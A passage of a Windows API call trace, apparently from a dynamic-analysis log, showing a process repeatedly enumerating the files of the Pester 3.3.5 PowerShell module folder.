Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.803] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.804] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0281.804] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0281.804] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0281.804] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0281.804] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0281.805] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0281.805] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0281.805] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0281.805] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0281.805] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0281.805] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0281.806] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0281.806] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0281.806] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0281.806] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.806] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.806] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.807] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2c10 [0281.807] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.808] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0281.808] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0281.808] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0281.808] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0281.808] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0281.808] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0281.809] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0281.809] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0281.809] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0281.809] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0281.809] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0281.809] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0281.809] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0281.810] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0281.810] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0281.810] FindClose (in: hFindFile=0x25b73cd2c10 | out: hFindFile=0x25b73cd2c10) returned 1 [0281.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.810] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c480, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0281.810] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c9b0 | out: lpFileInformation=0x653ef8c9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0281.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0281.810] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.811] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c630 | out: lpFindFileData=0x653ef8c630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.811] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.811] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0281.811] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0281.811] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0281.811] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0281.812] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0281.812] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 